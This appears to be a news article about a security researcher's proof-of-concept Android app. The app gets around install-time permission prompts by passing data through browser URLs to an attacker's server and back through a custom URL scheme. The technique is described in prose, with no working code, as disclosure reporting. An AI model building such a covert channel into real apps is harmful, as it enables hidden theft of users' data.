A security researcher has developed a proof-of-concept Android application that does not ask for user permissions during installation, but could give a hacker remote access to a device.
The app uses a known issue with Android web search to establish a two-way communication channel with a third party, ViaForensics director of research and development Thomas Cannon told ZDNet UK on Wednesday.
"On its own this attack could really only be used to read any data on the SD card, read some data shared by other apps, and read limited data about the device," Cannon told ZDNet UK in an email interview. "Combined with other vulnerabilities it can be expanded, for example it could download a root exploit at a later point in time and gain total control over the device, or it could leverage other unprotected capabilities that may exist on the device to, for example, send premium rate SMS."
When a user downloads an Android app, the user's device normally prompts the user with permissions the app is asking for — say, to give access to geolocation data, phone memory, or camera information — supposedly alerting the user to any malicious requests.
Once downloaded, Cannon's proof of concept opens a communications channel by loading the web browser, once the phone is locked, according to a video by Cannon. This establishes a shell, and allows semi-covert access, Cannon told ZDNet UK.
"The proof-of-concept is not completely covert since the web browser will need to be in the foreground during the attack," Cannon told ZDNet UK. "However, once complete, you can, to a degree, make things look normal again for the user. Technically there will still be some traces that the attack happened left behind if the user looks."
The app does not exploit a flaw in Android, more a feature, said Cannon.
"The app doesn't use a vulnerability in the browser as such, it simply calls the browser and passes it the URL of the attacker's server," said Cannon. "Except that the URL contains the data we want to send to the attacker. Similarly to receive data the browser gets redirected to a custom URL scheme the app has registered (e.g. myapp://host/some+data) which calls our app and passes it the data in the URL. That way we establish two-way communication."